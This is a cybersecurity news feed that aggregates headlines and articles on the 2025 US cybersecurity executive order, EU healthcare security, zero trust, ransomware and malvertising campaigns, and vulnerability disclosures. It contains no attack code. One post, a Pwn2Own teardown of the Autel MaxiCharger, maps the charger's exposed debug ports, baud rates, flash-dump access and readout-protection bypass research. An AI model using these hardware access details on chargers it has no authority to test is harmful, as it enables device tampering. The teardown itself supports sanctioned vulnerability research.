US president Joe Biden just issued a 40-page executive order that aims to bolster federal cybersecurity protections, directs government use of AI—and takes a swipe at Microsoft’s dominance.

by WIRED Security News

The U.S. Commerce Department has issued a rule banning connected vehicle technologies linked to China and Russia, citing national security risks. The post US issues final rule barring Chinese and Russian connected car tech appeared first on ZENDATA Cybersecurity.

by Zendata

Catchpoint''s 2025 SRE Report shows reliability teams are spending more time on operational tasks while grappling with evolving performance expectations.

by ITPro Today

Bitwarden is one of the best password managers on the market, but are you using it effectively? Here are a few tips to ensure you are.

by ZDNET Security

IT leaders and industry insiders share their AI trends and predictions for 2025.

by ITPro Today

Want to stay ahead in 2025? Here''s HTB''s take on the top trends shaping skills gaps in cybersecurity industry (and how your team can adapt to the changes ahead).

by Hack The Box Blog

The Executive Order on Strengthening and Promoting Innovation in the Nation’s Cybersecurity includes guidance on third-party risk management and the need to adopt proven security practices to gain visibility of security threats across network and cloud infrastructure. Here we highlight six key provisions and offer guidance on how federal agencies can prepare.On Jan. 16, the Biden Administration released the Executive Order on Strengthening and Promoting Innovation in the Nation’s Cybersecurity. In an era of escalating threats, it is important for the U.S. government to take steps toward a more secure digital infrastructure. The EO is being released in the wake of cyberattacks, such as Salt Typhoon, from China-based threat groups supported by the People’s Republic of China, which, as recently as last week, breached the U.S. Department of the Treasury.The EO is intended to build off President Joseph R. Biden’s previous EO 14028 and focuses on the nation’s ability to address key threats and defend against continued cyber campaigns targeting the United States and Americans, as well as ensuring the security of the services and capabilities most vital to the digital domain.As the Biden Administration comes to a close and President Donald J. Trump is sworn in on Jan. 20, it’s important to remember that cybersecurity is not a partisan issue, but a national security concern. Similar to our collaboration during the first Trump Administration, Tenable stands ready to engage with the incoming team to assess and defend critical networks in government and throughout enterprise to protect Americans and ensure the resilience of our critical infrastructure.While the EO is aimed at government agencies, many of the principles behind it are equally relevant to private sector organizations looking to improve their security posture. It includes guidance on third-party management practices, adopting proven security practices to gain visibility of security threats across networks and cloud infrastructure, and securing communications networks. It also provides recommendations on combating cybercrime and fraud, promoting security with artificial intelligence (AI) and aligning policy to practice.Below we highlight six key provisions of the EO and offer recommendations on how to prepare to meet the requirements.6 key provisions of the Executive Order on Strengthening and Promoting Innovation in the Nation’s Cybersecurity1. Operationalizing transparency and security in third-party software supply chainsThe EO mandates federal agencies adopt more rigorous third-party risk management practices to ensure the safety and security of the software providers operating within the federal government. It calls for:Software providers to submit secure software development attestations and high-level artifacts to validate the attestations to the Cybersecurity and Infrastructure Security Agency (CISA).The establishment of National Institute of Standards and Technology (NIST) guidelines and security practices for safe and secure software procurement, which will be incorporated into the Secure Software Development Framework (SSDF) and ultimately the White House Office of Management and Budget Memorandum M-22-18. It will include practices, procedures, controls and implementation examples.Federal agencies to comply with the guidance in NIST Special Publication 800-161 Revision 1 to integrate cybersecurity supply chain risk management programs into broader risk management activities.CISA and the General Services Administration to issue recommendations to agencies on the management of open source software.How to prepare: Start with an inventory of all third-party providers working with your agency. How much visibility do you have into the level of risk these providers present? Is their software integral to your agency’s ability to function? Can it access sensitive data, such as personally identifiable information (PII)? Does it offer an opportunity for an attacker to gain entry or move laterally within your infrastructure?2. Improving the cybersecurity of federal systemsThis section of the EO focuses on adopting proven security practices in order to gain visibility of security threats across networks and strengthen cloud security. Key call-outs in this section include:Identity and access management (IAM): Identity and access management practices are critical and should be implemented into an agency''s broader security strategy.Cloud security: In order to secure federal data in the cloud, The EO requires cloud services providers in the FedRAMP marketplace to produce baselines with specifications and recommendations for agency configurations of cloud-based systems.Space security: The security of space systems must be enhanced to adapt to evolving threats. The EO mandates that agencies take steps to continually verify that federal space systems have the requisite cybersecurity capabilities through actions like continuous assessments, testing, exercise and modeling and simulation.How to prepare: Audit your identity and access management systems. Are you considering user privileges in your overall risk profile? Consider how much access and visibility your security team has into your cloud infrastructure. Does your agency have continuous processes to manage identity and privileges across cloud environments? At what stage is security brought into your cloud deployments? It should be incorporated into the entire process, from ideation to system development and deployment. Are you performing continuous monitoring of IAM, cloud and space systems (if applicable)? Many third-party contracts pre-date supply chain risk-management reviews. Do your contracts account for security requirements and support?3. Securing federal communicationsThe EO emphasizes the importance of securing our communication networks from cyberattacks and sets forth guidelines and procedures to ensure the security of federal communications. Key points include:Strong identity authentication and encryption must be implemented.Encrypting DNS traffic is critical.Email messages, as well as modern communications such as voice and video conferencing and instant messaging, must be encrypted in transport and where practical use end-to-end encryption.Quantum computers pose significant risk to national security. Agencies should require post-quantum cryptography in applicable product categories as defined by CISA.The federal government should protect and audit access to cryptographic keys with extended lifecycles. Guidelines will be developed by NIST and FedRAMP requirements will be updated to incorporate those guidelines.How to prepare: Evaluate your identity authentication and encryption capabilities for all forms of communication, from DNS to email systems. Are you following NIST SP 800-63 Digital Identity Guidelines? Are there gaps in your systems that need to be addressed? Are there product categories within your systems that would require post-quantum cryptography? Non-quantum compliant cyphers will increasingly pose risk as quantum technologies radically redefine encryption.4. Solutions to combat cybercrime and fraudWith the growing demand for digital services, it is essential for agencies to adopt digital identity verification solutions that ensure secure access, enhance accessibility and prevent fraud. This section of the EO encourages the safe and secure use of digital identity documents to access public benefits programs that require identity verification. It states that NIST will issue implementation guidance and the Treasury will develop a pilot program to notify individuals when their identity information is used to request a payment from a public benefits program.How to prepare: Evaluate your digital identity verification strategy. How are you preventing digital identity fraud? What key performance indicators (KPIs) do you use to track the effectiveness of your program? Have you considered a more rigorous verification strategy that verifies identities at the front end? Are you using a holistic identity verification approach that validates multiple aspects of someone’s identity?5. Promoting security with and in artificial intelligence (AI)AI is emerging as a game changer in the ongoing battle for federal cybersecurity. As such, the EO calls on the federal government to accelerate the development and deployment of AI, specifically as it relates to improving the cybersecurity of critical infrastructure. The EO further establishes a pilot program on the use of AI to enhance cyber defenses of critical infrastructure and accelerates research at the intersection of AI and cybersecurity.How to prepare: Evaluate how AI can be implemented in your security strategy in order to reduce risk. Do you have guidelines for using AI in your agency? Have you experimented with AI security tools? Are there ways you can leverage AI to reduce the pressure on your security teams?6. Aligning policy to practiceThis section of the EO focuses on modernizing federal IT infrastructure and networks to better defend against cyberattacks and reduce cyber risk. It focuses on developing guidance to help agencies share and exchange cybersecurity information, obtain enterprise-wide visibility, and prepare to be held accountable for enterprise-wide cybersecurity programs. It further focuses on promoting the adoption of evolving cybersecurity practices, such as the migration to zero trust and ensuring agencies can identify, assess and respond to risk presented by IT vendor concentration.How to prepare: Assess how much visibility you currently have into your IT infrastructure. Are you able to continuously assess vulnerabilities and misconfigurations in your on-premises and cloud environments with the added context of identity and access privileges so you always have an up-to-date view of your risk? Do you have a way to quickly generate reports that you can share with other agencies?ConclusionThe Executive Order on Strengthening and Promoting Innovation in the Nation’s Cybersecurity addresses some of the most pressing concerns in cybersecurity, including the safety of the software supply chain, the need for improved visibility across systems such as identity and access management and cloud infrastructure, the need to protect communications with end-to-end encryption, and the promise of AI to aid in cybersecurity efforts. The provisions it provides offer a blueprint for improving cybersecurity for government agencies while providing sound guidance for private-sector organizations to consider in their efforts to reduce cyber risk.

by Tenable

The FBI has announced it''s deleted PlugX malware from approximately 4,258 US-based computers and networks.

by Malwarebytes Labs

Cybercriminals are exploiting the California wildfires by launching phishing scams. Learn how hackers are targeting victims with fake domains and deceptive tactics, and how to protect yourself from these cyber threats.

by Hackread

by ComputerWeekly

The European Commission has rolled out a comprehensive plan to fortify the cybersecurity of hospitals and healthcare providers across the EU. Recognizing the increasing frequency of cyberattacks on healthcare systems, this EU Action Plan aims to safeguard patient care, improve response capabilities, and establish trust in digital healthcare solutions. The healthcare sector has witnessed a rise in cyberattacks in recent years. In 2023 alone, EU Member States reported 309 significant cybersecurity incidents targeting healthcare providers—more than any other critical industry. These disruptions, which can delay medical procedures and endanger lives, highlight the pressing need for resilient cybersecurity strategies. Key Highlights of the EU Action Plan The EU Action Plan is designed to tackle cybersecurity challenges in the healthcare sector through a four-pronged approach: prevention, detection, response, and deterrence. Enhanced Prevention The plan emphasizes strengthening the healthcare sector''s preparedness to prevent cybersecurity incidents. This includes: Guidance on Critical Cybersecurity Practices: Hospitals and healthcare providers will receive tailored guidelines to implement best practices for cybersecurity. Cybersecurity Vouchers: Financial assistance in the form of vouchers will be made available to micro, small, and medium-sized healthcare providers to enhance their cybersecurity capabilities. Learning Resources: New educational tools and training programs will be developed to equip healthcare professionals with the knowledge needed to navigate cybersecurity challenges. Improved Threat Detection The EU Action Plan proposes the establishment of a Cybersecurity Support Centre for Hospitals and Healthcare Providers under the guidance of ENISA, the EU Agency for Cybersecurity. By 2026, the Centre will provide an EU-wide early warning system, offering near-real-time alerts about potential cyber threats. Effective Response to Cyberattacks To minimize the impact of cyber incidents, the Action Plan includes the following measures: A rapid response service under the EU Cybersecurity Reserve, leveraging private incident response providers to support healthcare organisations. Development of response playbooks to guide healthcare organisations in handling specific threats, such as ransomware. National cybersecurity exercises to strengthen incident response capabilities across Member States. Encouragement for Member States to mandate the reporting of ransom payments, enabling authorities to provide support and conduct follow-ups with law enforcement. Deterrence To discourage cyberattacks on European healthcare systems, the plan includes the use of the Cyber Diplomacy Toolbox—a coordinated EU diplomatic response to malicious cyber activities. This framework aims to hold cyber threat actors accountable and protect critical healthcare infrastructure. Collaborative Implementation and Next Steps The success of EU Action Plan will depend on collaboration among healthcare providers, Member States, and the cybersecurity community. To ensure the plan is effective and addresses the needs of all stakeholders, the Commission will soon launch a public consultation open to citizens and industry experts. The feedback gathered will help refine the proposed measures, with specific actions scheduled for rollout in 2025 and 2026. Building on a Strong Legislative Framework The EU Action Plan builds on existing EU legislation to strengthen cyber resilience. Healthcare providers are identified as a sector of high criticality under the NIS2 Directive, which works in tandem with the Cyber Resilience Act—a landmark EU regulation that mandates cybersecurity requirements for digital products. Additionally, the recently established Cyber Emergency Mechanism under the Cyber Solidarity Act will play a crucial role in detecting, preparing for, and responding to cybersecurity threats. The initiative also supports the broader goal of creating a European Health Data Space, a framework designed to empower citizens with control over their health data while ensuring the security of sensitive information. Henna Virkkunen, Executive Vice-President for Tech Sovereignty, Security, and Democracy, emphasized the importance of resilience in healthcare systems: ""Modern healthcare has made incredible advances through digital transformation, which has meant citizens have benefited from better healthcare. Unfortunately, health systems are also subject to cybersecurity incidents and threats. That is why we are launching an Action Plan to ensure that healthcare systems, institutions, and connected medical devices are resilient. Prevention is better than cure, so we need to prevent cyber-attacks from happening. But if they happen, we need to have everything in place to detect them and to quickly respond and recover."" Olivér Várhelyi, Commissioner for Health and Animal Welfare, highlighted the role of trust in digital healthcare: ""Digital technologies and health data-driven solutions have opened unparalleled opportunities in healthcare. They enable precision medicine, real-time patient monitoring, and seamless communication between healthcare providers across borders. But digitalisation is only as strong as the trust it inspires and resilient from cyberattacks. Patients must feel confident that their most sensitive information is secure. Healthcare professionals must have faith in the systems they use daily to save lives. Today’s Action Plan is an important step towards securing that trust and safeguarding a more resilient health ecosystem for the future."" A Step Towards a Secure Digital Healthcare Future The EU Action Plan reflects the Commission’s commitment to fostering a secure and resilient healthcare sector. By addressing cybersecurity challenges through prevention, detection, response, and deterrence, the plan lays the groundwork for a safer healthcare environment where technology empowers patients, enhances care, and supports professionals. As the healthcare sector continues to embrace digitalisation, the EU remains steadfast in its mission to protect its citizens and critical infrastructure from emerging cyber threats.

by The Cyber Express

Outgoing CISA Director Jen Easterly didn’t say what agencies were impacted by Salt Typhoon or when, but noted it provided greater visibility into the active campaign.

by Cybersecurity Dive

Released in the administration''s final days, the highly-anticipated order follows a series of sophisticated attacks against federal agencies and critical infrastructure providers.

by Cybersecurity Dive

by CrowdStrike

by CrowdStrike

The Joint Cyber Defense Collaborative playbook seeks to establish a "a unified approach" on how to handle AI-related cybersecurity threats.

by Dark Reading

Several governments participated in a meeting on the proliferation of commercial spyware at the United Nations Security Council. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

It''s an especially brazen form of malvertising, researchers say, striking at the heart of Google''s business; the tech giant says it''s aware of the issue and is working quickly to address the problem.

by Dark Reading

Cybersecurity researchers have alerted to a new malvertising campaign that''s targeting individuals and businesses advertising via Google Ads by attempting to phish for their credentials via fraudulent ads on Google. ""The scheme consists of stealing as many advertiser accounts as possible by impersonating Google Ads and redirecting victims to fake login pages,"" Jérôme Segura, senior director of

by The Hacker News

The North Korea-linked Lazarus Group has been attributed to a new cyber attack campaign dubbed Operation 99 that targeted software developers looking for freelance Web3 and cryptocurrency work to deliver malware. ""The campaign begins with fake recruiters, posing on platforms like LinkedIn, luring developers with project tests and code reviews,"" Ryan Sherstobitoff, senior vice president of Threat

by The Hacker News

Read actionable strategies to communicate cloud security gaps and recommendations to leadership.

by Mitiga

A recent cyberattack, mimicking the tactics of the notorious Black Basta ransomware group, targeted one of SlashNext’s clients.…

by Hackread

Cybersecurity researchers have identified infrastructure links between the North Korean threat actors behind the fraudulent IT worker schemes and a 2016 crowdfunding scam. The new evidence suggests that Pyongyang-based threamoret groups may have pulled off illicit money-making scams that predate the use of IT workers, SecureWorks Counter Threat Unit (CTU) said in a report shared with The Hacker

by The Hacker News

We tested the best free VPNs from reputable companies that offer solid services. Here''s what to know, how to avoid security risks, and what ZDNET''s recommendations are.

by ZDNET Security

Executive Summary In early December 2024, Arctic Wolf Labs identified a sophisticated cyberattack campaign targeting Fortinet FortiGate firewall devices. Unidentified threat actors exploited a suspected zero-day vulnerability to gain unauthorized access to the devices’ management interfaces, allowing them to alter firewall configurations and extract credentials using DCSync. Community Impact A successful compromise of FortiGate firewalls in this...

by RH-ISAC

As many as six security vulnerabilities have been disclosed in the popular Rsync file-synchronizing tool for Unix systems, some of which could be exploited to execute arbitrary code on a client. ""Attackers can take control of a malicious server and read/write arbitrary files of any connected client,"" the CERT Coordination Center (CERT/CC) said in an advisory. ""Sensitive data, such as SSH keys,

by The Hacker News

AI security automation requires access to the relevant data at the right time and place. This will be the most important capability that cybersecurity teams will need to have in 2025.

by Barracuda

Why does ICS/OT need specific controls and its own cybersecurity budget today? Because treating ICS/OT security with an IT security playbook isn’t just ineffective—it’s high risk. In the rapidly evolving domain of cybersecurity, the specific challenges and needs for Industrial Control Systems (ICS) and Operational Technology (OT) security distinctly stand out from traditional IT security. ICS/OT

by The Hacker News

BeyondTrust has patched all cloud instances of the vulnerability and has released patches for self-hosted versions.

by Dark Reading

Evidence suggests that some of the payloads and extensions may date as far back as April 2023.

by Dark Reading

The end of support is near for more than just Windows 10. But there''s no need to panic.

by ZDNET Security

"Operation 99" uses job postings to lure freelance software developers into downloading malicious Git repositories. From there, malware infiltrates developer projects to steal source code, secrets, and cryptocurrency.

by Dark Reading

Japan’s National Police Agency (NPA) has attributed more than 200 cyber incidents over the past five years to the China-aligned threat actor “MirrorFace,” Infosecurity Magazine reports.

by KnowBe4

Ultimately, there is no replacement for an intuitive, security-focused developer working with the critical thinking required to drive down the risk of both AI and human error.

by Dark Reading

Introducing Lightspark''s Public Bug Bounty Program HackerOne Wed, 01/15/2025 - 06:52 Body Expanding Our Bug Bounty ProgramAt Lightspark, we’ve always been focused on security that meets and exceeds industry standards. We’ve been partnering with HackerOne, the global leader in ethical hacking and human-powered security, on our bug bounty program. Today we’re announcing that we’re ramping up the scale of this reporting and sharing our bug bounty program publicly. We’ve already invited a few security researchers and white hat hackers to pressure test our offerings and collect bug reports - which has been so useful - but now we are formalizing our approach. Details on the ProgramOur rewards are based on severity. Hackers reporting vulnerabilities will receive the following payout levels (at Lightspark’s discretion), based on the tier of the vulnerability: Low - $150Medium - $750High - $2000Critical - $5000Hackers can report bugs on any facet of Lightspark, whether it’s our APIs, open source software, or website. We’re committed to meeting our response targets for hackers participating in our program, and we’ll keep everyone informed about our progress.We help our customers deliver Internet payments at scale and improve the financial system for everyone. Our customers rely on us to provide secure, enterprise-grade Lightning payment services. This update to our expanded bug bounty program demonstrates the importance of and our commitment to security in our services.We’re excited to work with the community and are looking forward to feedback. For more details on the Lightspark Bug Bounty Program, please visit hackerone.com/lightspark_bbp. Excerpt Lightspark is excited to announce the launch of its public bug bounty program with HackerOne. Main Image

by HackerOne

A trove of information on current and former students and teachers was accessed during the December cyberattack, sources say © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

For the upcoming Pwn2Own Automotive contest a total of 7 electric vehicle chargers have been selected. One of these is the Autel MaxiCharger AC Wallbox Commercial (MAXI US AC W12-L-4G) which also made an appearance at the inaugural Pwn2Own Automotive last January.  We have previously posted internal photos of the MaxiCharger in 2023 so the goal of this blog post is to present up to date internal photos of the main boards and provide additional information.InternalsOpening the MaxiCharger is easy and involves removing a few Torx T10 screws and then prying open the edges of the housing. The metrology board is mounted on the back part of the housing and is responsible for power monitoring, handling the input mains power and providing power to the charging cable. Most of the components mounted on the lower voltage part of the board (towards the top) are covered in conformal coating. Figure 1: Power board Towards the top right of the power board is the STM32F407ZGT6, which is a general purpose ARM Cortex-M4 microcontroller. Many of the pins are broken out surrounding the STM32 and are not covered in conformal coating allowing for easy probing.UART output can be viewed using the broken-out pins above the STM32 with a baud rate of 921600bps. SWD pins are also broken out which allows for full access to the STM32 including dumping the internal flash. A cursory glance of the flash dump shows references to FreeRTOS.The power board connects to the main board which is mounted on the top part of the housing. The main board is responsible for most of the heavy lifting, including handling Bluetooth, Wi-Fi, ethernet and more. This board isn''t covered in conformal coating but quite a few of the components are under metal shielding that was removed for the following photos. Figure 2: Main board (top) The main board contains many labelled test points that make for easy probing.In the top left is the Barrot BR8041A01 bluetooth module. There isn''t much publicly available information about this module. The test points nearby suggest that this module is operated over UART (BT_RX, BT_TX) however sniffing these points doesn''t show much other than very basic initialization even when attempting to pair a new device. Towards the center of the board is a IS65WV10248EBLL (PDF) SRAM chip.Flipping the main board over reveals the main processor and an ESP32. Again, there are many labelled test points. Figure 3: Main board (underside) The MCU is the GD32F407ZGT6 (PDF) ARM Cortex-M4. Interestingly it has been noted that Autel occasionally swap out the GD32F407ZGT6 for the STM32F407ZGT6 for unknown reasons, presumably due to supply. To the left of the battery is the broken out SWD pins for the MCU. Connecting to these pins shows that the MCU has been configured with readout protection level 1 (or ""Security Protection Code low"" to use GigaDevice''s terminology). Figure 4: Secured GD32 device detected This prevents tools such as ST-Link and J-Link from dumping the internal flash, however Jonathan Andersson and Thanos Kaliyanakis Blackhat EU talk details a few very interesting bypasses that circumvent this readout protection! One such method doesn’t require glitching.To the right of the MCU is a Winbond W25Q128JV (PDF) serial flash chip. Below is an RJ45 jack for ethernet communications. This is one of the ways the charger can connect to the internet, the other methods are Wi-Fi and over a mobile network.There is a mysterious USB C port to the left of the MCU which doesn''t have a documented use. This isn''t the only USB port on the Autel that has an unknown use, but it is the only one that can be accessed without dismantling the charger.The ESP32 module in the top left is the ESP32 WROOM 32D (PDF) which has Bluetooth and Wi-Fi capabilities. Internally the module uses the ESP32-D0WD dual core Xtensa MCU and a 4MB SPI flash chip.Directly above the USB C port one of the GD32 UARTs is broken out. Connecting with a baud rate of 921600bps shows a lot of debugging information. Interestingly, during initialization the string ""UART_WIFI_BT"" is printed alongside AT commands that are sent to the ESP32 from the GD32.  When pairing a new device, many of these messages are logged.Combining this information with the very little traffic sniffed to/from the Barrot bluetooth module over the test points hints towards the Barrot bluetooth module being redundant. It seems as though the ESP32 is used for the bluetooth operations.To the right of the ESP32 are more broken out pins, this time for one of the ESP32 UARTs and the IO0 pin which is used for the ESP32 boot mode selection. Connecting to the UART header at 115200 baud will show the usual ESP32 boot log.Stacked underneath the main board is the 4G board that has a SIM card tray and a mobile communications module. Figure 5: 4G mobile communications board The 4G module is the Quectel EC25AFXDGA (PDF) that internally uses the Qualcomm MDM9207 LTE modem which itself contains an ARM Cortex-A7 core. The SIM card tray sits to the left of the 4G module. Connecting the Autel to a mobile network is optional.The top right of the 4G board has a micro USB port with no known use. The charger must be disassembled to access this port. Presumably this is for some kind of debugging of the 4G module.A few pins are broken out from the 4G module along the left side of the board. Connecting to RXD and TXD at 115200 baud prints a Linux boot log which ultimately drops to a login prompt for the Quectel module. Above the UART connection is what''s labelled as ""BOOT"". Shorting these unpopulated headers together and then booting the charger changes the behavior of the 4G module. Notably, the UART connection doesn’t print out the Linux boot log anymore. This behavior may be linked to the aforementioned USB port but this wasn''t investigated further.Interestingly, under the 4G board is yet another unused micro USB port. This is attached to the back of the LCD board and is likely used for debugging LCD related functionality. The silkscreen also shows SWD related text. Figure 6: Unused USB port The final board of interest is the NFC and LED board which is connected to the main board. There is an unused 4 pin connector on the back of the board which is likely for debugging purposes. Figure 7: NFC and LED board (top) Flipping the board over reveals the NFC chip. Figure 8: Multi-protocol contactless transceiver The NFC chip is a Fudan Microelectronics FM17660 multi-protocol contactless transceiver IC.SummaryOverall, all the main components are the same as the previous MaxiCharger we tore down last year which is good news for any contestants who previously bought the MaxiCharger.Hopefully this blog post provides enough information to kickstart vulnerability research against the Autel MaxiCharger. Keep an eye out for future posts that will cover the threat landscape of the MaxiCharger.We are looking forward to Pwn2Own Automotive again in Tokyo in January 2025 at Automotive World, and we will see if IVI vendors have improved their product security. Don’t wait until the last minute to ask questions and register! We hope to see you there.You can find me on Twitter at @ByteInsight, and follow the team on Twitter, Mastodon, LinkedIn, or Bluesky for the latest in exploit techniques and security patches.

by Zero Day Initiative Blog

Russia and Azerbaijan deploy aligned narratives to undermine Armenia''s partnership with the West The post Russia and Azerbaijan’s narrative warfare against Armenia’s European path appeared first on DFRLab.

by DFRLab

AI has made an impact everywhere else across the tech world, so it should surprise no one that the 2024 ISC2 Cybersecurity Workforce Study saw artificial intelligence (AI) jump into the top five list of security skills. It’s not just the need for workers with security-related AI skills. The Workforce Study also takes a deep […] The post ISC2 Cybersecurity Workforce Study: Shortage of AI skilled workers appeared first on Security Intelligence.

by Security Intelligence

In a recent incident, Darktrace uncovered a M365 account takeover attempt targeting a company in the manufacturing industry. The attacker executed a sophisticated phishing attack, gaining access through the organization’s SaaS platform. This allowed the threat actor to create a new inbox rule, potentially setting the stage for future compromises.

by Darktrace

Discover the intricate process of chip decapping, exposing secrets stored within snuggly layers of industrial epoxy, sleeping in beds of silicon. The post Practical Methods for Decapping Chips appeared first on NetSPI.

by NetSPI

An ongoing malvertising campaign steals Google advertiser accounts via fraudulent ads for Google Ads itself.

by Malwarebytes Labs

The ransomware attack on Change Healthcare affected over 100 million Americans, the health giant told regulators. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

Lilith >_> of Cisco Talos discovered these vulnerabilities. Forty-four vulnerabilities and sixty-three CVEs were discovered across ten .cgi and three .sh files, as well as the static login page, of the Wavlink AC3000 wireless router web application.  The Wavlink AC3000 wireless router is one of the

by Cisco Talos Blog

The January 2025 Patch Tuesday consists of 159 Microsoft CVEs, including three that are actively exploited.

by ThreatDown

IT leaders and industry insiders share their software development trends and predictions for 2025.

by ITPro Today

A web shop selling jewelry was found with code belonging to two web skimmers and the SocGolish Trojan downloader.

by ThreatDown

Navigating layoffs is never easy, especially when tasked with offboarding longtime colleagues.

by ITPro Today

A report from Allianz shows the global disruption caused by CrowdStrike’s IT mishap added to longtime concerns about data breaches and ransomware.

by Cybersecurity Dive

The U.S. Department of Justice (DoJ) on Tuesday disclosed that a court-authorized operation allowed the Federal Bureau of Investigation (FBI) to delete PlugX malware from over 4,250 infected computers as part of a ""multi-month law enforcement operation."" PlugX, also known as Korplug, is a remote access trojan (RAT) widely used by threat actors associated with the People''s Republic of China (PRC

by The Hacker News

In the modern IT landscape GSI’s, MSP’s, and VAR’s are tasked with delivering robust, scalable, and secure solutions to their enterprise clients. With the ever-growing cybersecurity threats and increasing regulatory requirements, the addition of security validation and exposure validation services to a provider’s service offering is no longer optional—it’s a strategic necessity. 

by Picus Security

Microsoft kicked off 2025 with a new set of patches for a total of 161 security vulnerabilities across its software portfolio, including three zero-days that have been actively exploited in attacks. Of the 161 flaws, 11 are rated Critical and 149 are rated Important in severity. One other flaw, a non-Microsoft CVE related to a Windows Secure Boot bypass (CVE-2024-7344, CVSS score: 6.7), has not

by The Hacker News

Cybersecurity researchers have disclosed multiple security flaws in SimpleHelp remote access software that could lead to information disclosure, privilege escalation, and remote code execution. Horizon3.ai researcher Naveen Sunkavally, in a technical report detailing the findings, said the ""vulnerabilities are trivial to reverse and exploit."" The list of identified flaws is as follows -

by The Hacker News

Between September and October 2024, Darktrace investigated several customer networks compromised by RansomHub attacks. Further analysis revealed a connection to the ShadowSyndicate threat group. Read on to discover how these entities are linked and the tactics, techniques, and procedures employed in these attacks.

by Darktrace

About the customer: Serving more than two million active customers, this leading money transmitter, facilitates more than $9 billion in remittances via thousands of agent locations across the US. Customers can transfer funds to hundreds of thousands of locations–including 2,000 banks, across 80 countries for cash payout or direct deposits to bank accounts.

by Darktrace

by ComputerWeekly

APIContext has released its UK Open Banking API Performance 2023-2024 Report, the annual analysis of the performance of the open banking APIs exposed by the large CMA9 UK banks (the nine largest banks required by UK law to provide open banking services), traditional High Street banks, credit card providers, building societies, and new digital banks (neobanks). […] The post Open Banking Shortcomings Threaten UK Global Leadership Position Research Finds appeared first on IT Security Guru.

by IT Security Guru

People who unwittingly follow the instructions in certain malicious text messages end up bypassing Apple''s phishing protection.

by ZDNET Security

On January 14, 2025, the United Nations Security Council convened an informal meeting to address the escalating threat posed by commercial spyware. The post UN Security Council members meet on spyware for first time appeared first on ZENDATA Cybersecurity.

by Zendata

by ComputerWeekly

by ComputerWeekly

by ComputerWeekly

Zero trust as a concept is simple to grasp. Implementing a zero trust architecture, on the other hand, is complex because it involves addressing a unique mix of process, procedure, technology and user education. Here are some considerations to keep in mind as you begin your journey.Draft guidance on implementing a zero trust architecture, released by the National Institute of Standards and Technology (NIST) on Dec. 4, 2024, gives government agencies and private sector organizations a solid blueprint to follow. There are a number of additional considerations to keep in mind as you begin your journey.First and foremost, zero trust is an alternative way of thinking about information security that treats trust as a vulnerability. It removes trust entirely from digital systems and is built upon the idea that security must become ubiquitous throughout the infrastructure. The concepts of zero trust are simple:All resources are accessed in a secure manner, regardless of location.Access control is on a ""need-to-know"" basis and is strictly enforced.All traffic is inspected and logged.The network is designed from the inside out.The network is designed to verify everything and trust nothing.A zero trust architecture can be implemented using commercial off-the-shelf technology. It''s built upon current cybersecurity best practices and dovetails with a robust exposure management program. In fact, exposure management and zero trust go hand-in-hand.5 things to keep in mind about zero trustHere are five considerations as you begin your zero trust journey:Zero trust is a strategy, not a SKU. In most organizations, it can be implemented using existing off-the-shelf cybersecurity products. There is no single zero trust product your organization can purchase and plug in to transform your risk posture overnight.Zero trust requires a foundation of strong exposure management. As the National Institute of Standards and Technology (NIST) guidelines make clear, you can''t build a zero trust strategy without first having accurate visibility into all of the organization''s assets — including IT, cloud, operational technology (OT) and internet of things (IoT). An exposure management program can provide you with that level of visibility as well as the ability to act on findings in real time.User profiles matter more than ever. A zero trust strategy requires you to continuously monitor all users all the time. Identity and access management capabilities such as Entra ID and Active Directory, which are used to manage user profiles and privileges, must be continuously monitored and kept up to date.No one is trusted — no exceptions. This may not please senior leaders, who can sometimes behave as if the rules don''t apply to them. Brushing up on your diplomatic skills is advised. Ultimately, though, a zero trust architecture can be implemented without creating significant friction for end users.Zero trust requires thoughtful communication. There are people throughout the organization who have built their careers on the legacy cybersecurity principles of moat-and-castle and trust-but-verify. They may be threatened or feel that their jobs are in jeopardy if they aren''t engaged in the zero trust buildout from day one.Zero trust as a concept is simple to grasp. What makes zero trust complex to implement are the same factors that make any cybersecurity strategy complex: the unique mix of processes, procedures and technology found in your IT infrastructure, as well as the need for significant user education. It''s best to start small and roll out from there, rather than trying to boil the ocean.For cybersecurity leaders in government agencies, preparing for a zero trust architecture is less an exercise in evaluating technologies and more an exercise in strategic thinking, requiring you to answer fundamental questions such as:What is your agency’s core mission or value proposition?What are the workflows required to fulfill that mission?Who owns those workflows?How does data flow in the organization?Which are your high-value assets, the so-called ""keys to the kingdom""?How does the organization determine who is granted access to these high-value assets?How often does the organization audit user permissions once they are set?What building blocks do you already have in place to support a zero trust strategy?Answering these questions requires full visibility and continuous monitoring of your entire attack surface, including IT, internet of things (IoT) and operational technology (OT) assets, and the ability to assess the criticality of each asset to deliver on your organization''s core mission. No zero trust journey can begin without first addressing these fundamentals of exposure management.How zero trust and exposure management go hand-in-handExposure management transcends the limitations of siloed security programs. Built on the foundations of risk-based vulnerability management, exposure management takes a broader view across your modern attack surface, applying both technical and business context to more precisely identify and more accurately communicate cyber risk, enabling better business outcomes.An exposure management program combines technologies such as vulnerability management, web application security, cloud security, identity security, attack path analysis and patch management to help an organization understand the full breadth and depth of its exposures and take the actions needed to reduce them through remediation and incident response workflows. Exposure management gives security teams a full, dynamic and accurate picture of the attack surface at any point in time, aiding in the implementation of zero trust policies and architecture.Learn moreDownload the Gartner report How to Grow Vulnerability Management into Exposure ManagementRead the blogs Tenable and the Path to Zero Trust and Making Zero Trust Architecture AchievableView the updated draft Guidance for Implementing a Zero Trust Architecture, released by NIST on Dec. 4, 2024

by Tenable

Ransomware remains the top cyber risk concern among executives, but CISOs are almost twice as likely as CEOs to make that determination.

by Cybersecurity Dive

December 2024 marked the highest number of victims recorded in a single month. A key factor is likely the growth of the ransomware ecosystem itself.

by ReliaQuest

by ComputerWeekly

Brace yourselves... and consider reading your email in plaintext for now

by Sophos News

In 2024, the Taiwanese government saw the daily average of attempted attacks by China double to 2.4 million, with a focus on government targets and telecommunications firms.

by Dark Reading

by CrowdStrike

by CrowdStrike

by CrowdStrike

Discover how BFI Finance Indonesia transformed their SDLC with proactive security practices, improving compliance, developer experience, and collaboration. Learn key insights from their journey shared at CISO Indonesia 2024, moderated by Snyk''s Didik Achmadi.

by Snyk

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Microsoft Office Word. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-21363.

